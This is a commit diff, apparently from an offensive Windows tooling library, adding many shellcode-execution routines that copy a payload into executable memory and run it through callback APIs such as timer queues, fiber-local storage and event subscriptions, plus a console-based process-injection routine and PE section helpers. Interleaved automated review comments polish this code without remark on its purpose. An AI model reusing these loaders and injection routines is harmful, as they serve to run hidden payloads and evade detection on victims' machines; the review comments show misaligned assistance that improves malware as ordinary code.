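+goto EXIT_ROUTINE;
+hHandle = CreateFileW(PathToBinary, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+if (hHandle == INVALID_HANDLE_VALUE)
+goto EXIT_ROUTINE;
+Buffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
+if (Buffer == NULL)
+goto EXIT_ROUTINE;
+if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
+goto EXIT_ROUTINE;
+if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
+goto EXIT_ROUTINE;
+SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
+for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
+{
+if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, SectionName) == ERROR_SUCCESS)
+bFlag = TRUE;
+}
+EXIT_ROUTINE:
+if (Buffer)
+HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
+if (hHandle)
+CloseHandle(hHandle);
+return bFlag;
+}
+BOOL IsPeSectionA(_In_ LPCSTR PathToBinary, _In_ LPCSTR PeSectionName)
+{
+BOOL bFlag = FALSE;
+HANDLE hHandle = INVALID_HANDLE_VALUE;
+PBYTE Buffer = NULL;
+LONGLONG SizeOfTargetBinary = 0L;
+PIMAGE_DOS_HEADER Dos = NULL;
+PIMAGE_NT_HEADERS Nt = NULL;
+PIMAGE_FILE_HEADER File = NULL;
+PIMAGE_OPTIONAL_HEADER Optional = NULL;
+PIMAGE_SECTION_HEADER Section = NULL;
+PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
+SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)PathToBinary, FILE_ATTRIBUTE_NORMAL);
+if (SizeOfTargetBinary == INVALID_FILE_SIZE)
+goto EXIT_ROUTINE;
+hHandle = CreateFileA(PathToBinary, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+if (hHandle == INVALID_HANDLE_VALUE)
+goto EXIT_ROUTINE;
+Buffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
+if (Buffer == NULL)
+goto EXIT_ROUTINE;
+if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
+goto EXIT_ROUTINE;
+if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
+goto EXIT_ROUTINE;
+SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
+for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
+{
+if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, PeSectionName) == ERROR_SUCCESS)
+bFlag = TRUE;
+}
+EXIT_ROUTINE:
+if (Buffer)
+HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
+if (hHandle)
+CloseHandle(hHandle);
+return bFlag;
+}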
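Review bot: `IsPeSectionA` obtains the size with `GetFileSizeFromPathW((PWCHAR)PathToBinary, FILE_ATTRIBUTE_NORMAL);` although `PathToBinary` is a narrow `LPCSTR`, so the ANSI bytes are read as UTF-16 and the lookup targets the wrong path; `AddSectionToPeFileA` in this same commit uses `GetFileSizeFromPathA((PCHAR)Path, FILE_ATTRIBUTE_NORMAL)`, which is what is needed here. `StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, ...)` treats the 8-byte `Name` field as a NUL-terminated string, but a name that fills all IMAGE_SIZEOF_SHORT_NAME bytes has no terminator and the compare reads on into `Misc.VirtualSize`; compare at most IMAGE_SIZEOF_SHORT_NAME bytes instead, in both variants. In the W variant the conversion into `CHAR SectionName[32]` is driven by `StringLengthW(PeSectionName)` rather than the buffer size, so a longer name overruns the stack array. `ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL)` also passes the LONGLONG where a DWORD is expected, unlike the explicit `(DWORD)` cast used in AddSectionToPeFile, and `Section`/`Optional` are assigned but never used.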


@ -2,7 +2,7 @@
#include <psapi.h>
BOOL IsProcessRunningA(_In_ PCHAR ProcessNameWithExtension)
BOOL IsProcessRunningA(_In_ LPCSTR ProcessNameWithExtension)
{
HANDLE hProcess = NULL;
@ -43,7 +43,7 @@ BOOL IsProcessRunningA(_In_ PCHAR ProcessNameWithExtension)
return FALSE;
}
BOOL IsProcessRunningW(_In_ PWCHAR ProcessNameWithExtension)
BOOL IsProcessRunningW(_In_ LPCWSTR ProcessNameWithExtension)
{
HANDLE hProcess = NULL;


@ -4,10 +4,13 @@ INT main(VOID)
{
PCHAR Buffer = NULL;
DWORD dwSize = 0;
HMODULE hMod = NULL;
Buffer = GenericShellcodeHelloWorldMessageBoxA(&dwSize);
Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
MpfSceViaMessageBoxIndirectW((PBYTE)Buffer, dwSize);
//MpfPiControlInjection((PBYTE)Buffer, dwSize, 19768);
//MpfSceViaInitOnceExecuteOnce((PBYTE)Buffer, dwSize);
if (Buffer)
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);


@ -17,7 +17,7 @@ BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _I
HANDLE hHandle = NULL;
LPVOID BaseAddress = NULL;
INPUT Input = { 0 };
BOOL bFlag = FALSE;
BOOL bFlag = FALSE;
hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
hKernelbase = GetModuleHandleEx2W(L"kernelbase.dll");
@ -47,20 +47,30 @@ BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _I
if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
goto EXIT_ROUTINE;
if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
if (ConsoleAttachList[0] != GetCurrentProcessId())
ParentId = ConsoleAttachList[0];
else
ParentId = ConsoleAttachList[1];
FreeConsole();
AttachConsole(TargetProcessId);
if (!FreeConsole())
goto EXIT_ROUTINE;
hWindow = GetConsoleWindow();
if (!AttachConsole(TargetProcessId))
goto EXIT_ROUTINE;
FreeConsole();
AttachConsole(ParentId);
hWindow = (HWND)GetPeb()->ProcessParameters->ConsoleHandle;
if (hWindow == NULL)
goto EXIT_ROUTINE;
if (!FreeConsole())
goto EXIT_ROUTINE;
if (!AttachConsole(ParentId))
goto EXIT_ROUTINE;
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, TargetProcessId);
if (hHandle == NULL)
goto EXIT_ROUTINE;
BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BaseAddress == NULL)


@ -0,0 +1,48 @@
#include "Win32Helper.h"
VOID InvokeCertFindChainInStoreCallbackRoutine(LPVOID lpParameter)
{
/*
HCERTSTORE hCertStore = NULL;
CERT_CHAIN_FIND_ISSUER_PARA Issuer = { 0 };
hCertStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, NULL, CERT_SYSTEM_STORE_CURRENT_USER, L"My");
if (hCertStore == NULL)
return;
Issuer.cbSize = sizeof(CERT_CHAIN_FIND_ISSUER_PARA);
Issuer.pfnFindCallback = (PFN_CERT_CHAIN_FIND_BY_ISSUER_CALLBACK)lpParameter;
CertFindChainInStore(hCertStore, X509_ASN_ENCODING, 0, CERT_CHAIN_FIND_BY_ISSUER, &Issuer, NULL);
if(hCertStore)
CertCloseStore(hCertStore, 0);
*/
}
BOOL MpfSceViaCertFindChainInStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
/*
!!! UNIMPLEMENTED - UNABLE TO GET SHELLCODE EXECUTION WORKING!!!
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCertFindChainInStoreCallbackRoutine, BinAddress, INFINITE);
return TRUE;
*/
return FALSE;
}


@ -0,0 +1,56 @@
#include "Win32Helper.h"
VOID InvokeCreateThreadpoolWaitCallbackRoutine(LPVOID lpParameter)
{
/*
HANDLE hEvent;
PTP_WAIT Wait = NULL;
hEvent = CreateEventW(NULL, FALSE, FALSE, NULL);
if (hEvent == NULL)
goto EXIT_ROUTINE;
Wait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)lpParameter, NULL, NULL);
if(Wait == NULL)
goto EXIT_ROUTINE;
SetThreadpoolWait(Wait, hEvent, 0);
SetEvent(hEvent);
WaitForThreadpoolWaitCallbacks(Wait, FALSE);
SetEvent(hEvent);
Sleep(10000); //arbitrary sleep time...
EXIT_ROUTINE:
if (hEvent)
CloseHandle(hEvent);
return;
*/
}
BOOL MpfSceViaCreateThreadpoolWait(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
/*
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCreateThreadpoolWaitCallbackRoutine, BinAddress, INFINITE);
return TRUE;
*/
return FALSE;
}


@ -0,0 +1,47 @@
#include "Win32Helper.h"
VOID InvokeCreateTimerQueueTimerCallbackRoutine(LPVOID lpParameter)
{
HANDLE Timer = NULL, Queue = NULL, Event = NULL;
Queue = CreateTimerQueue();
if (Queue == NULL)
goto EXIT_ROUTINE;
Event = CreateEventW(NULL, TRUE, FALSE, NULL);
if (Event == NULL)
goto EXIT_ROUTINE;
if (!CreateTimerQueueTimer(&Timer, Queue, (WAITORTIMERCALLBACK)lpParameter, NULL, 100, 0, 0))
goto EXIT_ROUTINE;
WaitForSingleObject(Event, INFINITE);
EXIT_ROUTINE:
if (Event)
CloseHandle(Event);
#pragma warning( push )
#pragma warning( disable : 6031)
if(Queue)
DeleteTimerQueue(Queue);
#pragma warning( pop )
return;
}
BOOL MpfSceViaCreateTimerQueueTimer(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCreateTimerQueueTimerCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}


@ -0,0 +1,23 @@
#include "Win32Helper.h"
#include "Win32Helper.h"
VOID InvokeCryptEnumOIDInfoCallbackRoutine(LPVOID lpParameter)
{
CryptEnumOIDInfo(NULL, NULL, NULL, (PFN_CRYPT_ENUM_OID_INFO)lpParameter);
}
BOOL MpfSceViaCryptEnumOIDInfo(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCryptEnumOIDInfoCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}
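Review bot: `#include "Win32Helper.h"` appears twice at the top of this new file (the first two lines of the hunk); the duplicate is harmless only if the header is guarded, and every other new file in this commit includes it once, so the second line should be dropped. Nothing else in the hunk depends on it.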


@ -0,0 +1,37 @@
#include "Win32Helper.h"
VOID InvokeDSA_EnumCallbackCallbackRoutine(LPVOID lpParameter)
{
HDSA hDSA = NULL;
hDSA = DSA_Create(1, 1);
if (hDSA == NULL)
goto EXIT_ROUTINE;
if (DSA_InsertItem(hDSA, 0x7ffffff, &hDSA) == -1)
goto EXIT_ROUTINE;
DSA_EnumCallback(hDSA, (PFNDAENUMCALLBACK)lpParameter, NULL);
EXIT_ROUTINE:
if(hDSA)
DSA_Destroy(hDSA);
return;
}
BOOL MpfSceViaDSA_EnumCallback(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeDSA_EnumCallbackCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}
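Review bot: `DSA_InsertItem(hDSA, 0x7ffffff, &hDSA)` uses a seven-f literal that reads like a hand-typed DA_LAST (0x7FFFFFFF, eight f's); since the value exceeds the element count the insert presumably still lands at the end, but the named constant from dpa_dsa.h says what is meant: `if (DSA_InsertItem(hDSA, DA_LAST, &hDSA) == -1)`. If a specific index really is intended, a short comment on that line should say why.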


@ -0,0 +1,33 @@
#include "Win32Helper.h"
VOID InvokeEnumPropsExWCallbackRoutine(LPVOID lpParameter)
{
/*
THIS FUNCTION FAILS- NOTE
GetTopWindow function (winuser.h)
If the function succeeds, the return value is a handle to the child window at the top
of the Z order. If the specified window has no child windows, the return value is NULL.
To get extended error information, use the GetLastError function.
*/
EnumPropsExW(GetTopWindow(NULL), (PROPENUMPROCEXW)lpParameter, NULL);
}
BOOL MpfSceViaEnumPropsExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumPropsExWCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}
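Review bot: The comment block at the top of `InvokeEnumPropsExWCallbackRoutine` says `THIS FUNCTION FAILS` and then only pastes the GetTopWindow documentation, so a reader cannot tell what fails or where; replace the pasted text with one line stating the observed failure, e.g. `// NOTE: known not to work — <which call> returns <what>; kept for reference`. The prototype this commit adds to Win32Helper.h for `MpfSceViaEnumPropsExW` carries no annotation at all, while its neighbours `MpfSceViaCertFindChainInStore` and `MpfSceViaCreateThreadpoolWait` are marked `//Not working?` and `//Unstable`; the header should say the same thing the source does.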


@ -0,0 +1,37 @@
#include "Win32Helper.h"
VOID InvokeEvtSubscribeCallbackRoutine(LPVOID lpParameter)
{
EVT_HANDLE hEvent = NULL;
hEvent = EvtSubscribe(NULL, NULL, L"Application", L"*[System/EventID=1]", NULL, NULL, (EVT_SUBSCRIBE_CALLBACK)lpParameter, EvtSubscribeToFutureEvents);
if (hEvent == NULL)
goto EXIT_ROUTINE;
if (CveEventWrite(L"2022-123456", L"Pseudo-random-string") != ERROR_SUCCESS)
goto EXIT_ROUTINE;
Sleep(10000); //arbitrary sleep time..
EXIT_ROUTINE:
if(hEvent)
EvtClose(hEvent);
return;
}
BOOL MpfSceViaEvtSubscribe(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEvtSubscribeCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}


@ -0,0 +1,28 @@
#include "Win32Helper.h"
VOID InvokeFlsAllocCallbackRoutine(LPVOID lpParameter)
{
DWORD dwIndex = ERROR_SUCCESS;
dwIndex = FlsAlloc((PFLS_CALLBACK_FUNCTION)lpParameter);
if (dwIndex == FLS_OUT_OF_INDEXES)
return;
FlsSetValue(dwIndex, (PVOID)"Data");
}
BOOL MpfSceViaFlsAlloc(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeFlsAllocCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}


@ -0,0 +1,21 @@
#include "Win32Helper.h"
VOID InvokeImmEnumInputContextCallbackRoutine(LPVOID lpParameter)
{
ImmEnumInputContext(NULL, (IMCENUMPROC)lpParameter, NULL);
}
BOOL MpfSceViaImmEnumInputContext(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeImmEnumInputContextCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}


@ -0,0 +1,24 @@
#include "Win32Helper.h"
VOID InvokeInitOnceExecuteOnceCallbackRoutine(LPVOID lpParameter)
{
INIT_ONCE InitOnce = INIT_ONCE_STATIC_INIT;
PVOID Context;
InitOnceExecuteOnce(&InitOnce, (PINIT_ONCE_FN)lpParameter, NULL, &Context);
}
BOOL MpfSceViaInitOnceExecuteOnce(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
{
LPVOID BinAddress = NULL;
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (BinAddress == NULL)
return FALSE;
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeInitOnceExecuteOnceCallbackRoutine, BinAddress, INFINITE);
return TRUE;
}


@ -1,13 +1,13 @@
#include "StringManipulation.h"
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ PWCHAR String2)
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ LPCWSTR String2)
{
StringCopyW(&String[StringLengthW(String)], String2);
return String;
}
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ PCHAR String2)
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ LPCSTR String2)
{
StringCopyA(&String[StringLengthA(String)], String2);


@ -1,6 +1,6 @@
#include "StringManipulation.h"
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ PCHAR String2)
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ LPCSTR String2)
{
PCHAR p = String1;
@ -9,7 +9,7 @@ PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ PCHAR String2)
return String1;
}
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ PWCHAR String2)
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ LPCWSTR String2)
{
PWCHAR p = String1;


@ -9,10 +9,11 @@ PCHAR SecureStringCopyA(_Inout_ PCHAR String1, _In_ LPCSTR String2, _In_ SIZE_T
PWCHAR SecureStringCopyW(_Inout_ PWCHAR String1, _In_ LPCWSTR String2, _In_ SIZE_T Size);
INT StringCompareA(_In_ LPCSTR String1, _In_ LPCSTR String2);
INT StringCompareW(_In_ LPCWSTR String1, _In_ LPCWSTR String2);
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ PWCHAR String2);
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ PCHAR String2);
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ PCHAR String2);
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ PWCHAR String2);
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ LPCWSTR String2);
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ LPCSTR String2);
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ LPCSTR String2);
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ LPCWSTR String2);
//todo
PCHAR StringFindSubstringA(_In_ PCHAR String1, _In_ PCHAR String2);
PWCHAR StringFindSubstringW(_In_ PWCHAR String1, _In_ PWCHAR String2);
SIZE_T StringLengthA(_In_ LPCSTR String);
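Review bot: `StringFindSubstringA` and `StringFindSubstringW` on the lines under `//todo` still take `PCHAR`/`PWCHAR` while every prototype around them is moved to `LPCSTR`/`LPCWSTR` in this hunk, so the const-correctness pass stops one line short. If that is deliberate because the implementations are unfinished, say so on the `//todo` line, e.g. `//todo: not yet implemented; signatures to be made const like the rest`; otherwise change them to `_In_ LPCSTR`/`_In_ LPCWSTR` now so the header does not need a second pass.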


@ -131,6 +131,7 @@
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="AddSectionToPeFile.cpp" />
<ClCompile Include="AdfCloseHandleOnInvalidAddress.cpp" />
<ClCompile Include="AdfIsCreateProcessDebugEventCodeSet.cpp" />
<ClCompile Include="AdfOpenProcessOnCsrss.cpp" />
@ -168,6 +169,7 @@
<ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
<ClCompile Include="IsPeSection.cpp" />
<ClCompile Include="MiscGenericShellcodePayloads.cpp" />
<ClCompile Include="GetByteArrayFromFile.cpp" />
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp" />
@ -258,6 +260,11 @@
<ClCompile Include="MpfSceViaCDefFolderMenu_Create2.cpp" />
<ClCompile Include="MpfSceViaCertEnumSystemStore.cpp" />
<ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp" />
<ClCompile Include="MpfSceViaCertFindChainInStore.cpp" />
<ClCompile Include="MpfSceViaCreateThreadpoolWait.cpp" />
<ClCompile Include="MpfSceViaCreateTimerQueueTimer.cpp" />
<ClCompile Include="MpfSceViaCryptEnumOIDInfo.cpp" />
<ClCompile Include="MpfSceViaDSA_EnumCallback.cpp" />
<ClCompile Include="MpfSceViaEnumChildWindows.cpp" />
<ClCompile Include="MpfSceViaEnumDateFormatsW.cpp" />
<ClCompile Include="MpfSceViaEnumDesktopsW.cpp" />
@ -269,6 +276,7 @@
<ClCompile Include="MpfSceViaEnumFontsW.cpp" />
<ClCompile Include="MpfSceViaEnumLanguageGroupLocalesW.cpp" />
<ClCompile Include="MpfSceViaEnumObjects.cpp" />
<ClCompile Include="MpfSceViaEnumPropsExW.cpp" />
<ClCompile Include="MpfSceViaEnumPwrSchemes.cpp" />
<ClCompile Include="MpfSceViaEnumResourceTypesExW.cpp" />
<ClCompile Include="MpfSceViaEnumSystemCodePagesW.cpp" />
@ -280,6 +288,10 @@
<ClCompile Include="MpfSceViaEnumUILanguagesW.cpp" />
<ClCompile Include="MpfSceViaEnumWindows.cpp" />
<ClCompile Include="MpfSceViaEnumWindowStationsW.cpp" />
<ClCompile Include="MpfSceViaEvtSubscribe.cpp" />
<ClCompile Include="MpfSceViaFlsAlloc.cpp" />
<ClCompile Include="MpfSceViaImmEnumInputContext.cpp" />
<ClCompile Include="MpfSceViaInitOnceExecuteOnce.cpp" />
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
@ -290,6 +302,7 @@
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
<ClCompile Include="SnapshotInsertHardwareBreakpointHookIntoTargetThread.cpp" />
<ClCompile Include="WriteDataToPeSection.cpp" />
<ClCompile Include="__unstable__preview__MpfSilentInstallGoogleChromePlugin.cpp" />
<ClCompile Include="SendIcmpEchoMessageToIPv4Host.cpp" />
<ClCompile Include="OleGetClipboardData.cpp" />
@ -303,7 +316,6 @@
<ClCompile Include="SetLastErrorInTeb.cpp" />
<ClCompile Include="SetLastNtStatusInTeb.cpp" />
<ClCompile Include="SetProcessPrivilegeToken.cpp" />
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp" />
<ClCompile Include="ShlwapiCharStringToWCharString.cpp" />
<ClCompile Include="ShlwapiWCharStringToCharString.cpp" />
<ClCompile Include="StringCompare.cpp" />


@ -552,9 +552,6 @@
<ClCompile Include="MpfPiControlInjection.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
</ClCompile>
<ClCompile Include="ShellcodeExecutionViaFunctionCallbackMain.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="UacBypassFodHelperMethod.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\UAC Bypasses</Filter>
</ClCompile>
@ -651,6 +648,45 @@
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaImmEnumInputContext.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaCertFindChainInStore.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaEnumPropsExW.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaCreateThreadpoolWait.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaCryptEnumOIDInfo.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaDSA_EnumCallback.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaCreateTimerQueueTimer.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaEvtSubscribe.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaInitOnceExecuteOnce.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="MpfSceViaFlsAlloc.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="IsPeSection.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="AddSectionToPeFile.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="WriteDataToPeSection.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Internal.h">


@ -16,6 +16,9 @@
#include <windns.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <imm.h>
#include <dpa_dsa.h>
#include <winevt.h>
#pragma comment(lib, "Dnsapi.lib")
@ -26,6 +29,9 @@
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "PowrProf.lib")
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "Imm32.lib")
#pragma comment(lib, "Comctl32.lib")
#pragma comment(lib, "Wevtapi.lib")
#ifndef NT_SUCCESS
@ -80,40 +86,33 @@ DWORD RtlNtStatusToDosErrorViaImport(_In_ NTSTATUS Status);
/*******************************************
CRYPTOGRAPHY RELATED
*******************************************/
//#define TOKENIZE( x ) #x
//#define CONCAT3( X, Y, Z ) X##Y##Z
//#define HASHALGOA HashStringDjb2A
//#define hasha( VAL ) constexpr auto CONCAT3(hash,VAL,A) = HASHALGOA((PCHAR)TOKENIZE(VAL))
//#define hashw( VAL ) constexpr auto CONCAT3(hash,VAL,W) = HASHALGOA((PWCHAR)TOKENIZE(VAL))
DWORD HashStringDjb2A(_In_ PCHAR String);
DWORD HashStringDjb2W(_In_ PWCHAR String);
ULONG HashStringFowlerNollVoVariant1aA(_In_ PCHAR String);
ULONG HashStringFowlerNollVoVariant1aW(_In_ PWCHAR String);
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String);
UINT32 HashStringJenkinsOneAtATime32BitW(_In_ PWCHAR String);
DWORD HashStringLoseLoseA(_In_ PCHAR String);
DWORD HashStringLoseLoseW(_In_ PWCHAR String);
INT HashStringRotr32A(_In_ PCHAR String);
INT HashStringRotr32W(_In_ PWCHAR String);
DWORD HashStringSdbmA(_In_ PCHAR String);
DWORD HashStringSdbmW(_In_ PWCHAR String);
UINT32 HashStringSuperFastHashA(_In_ PCHAR String);
UINT32 HashStringSuperFastHashW(_In_ PWCHAR String);
INT HashStringUnknownGenericHash1A(_In_ PCHAR String);
INT HashStringUnknownGenericHash1W(_In_ PWCHAR String);
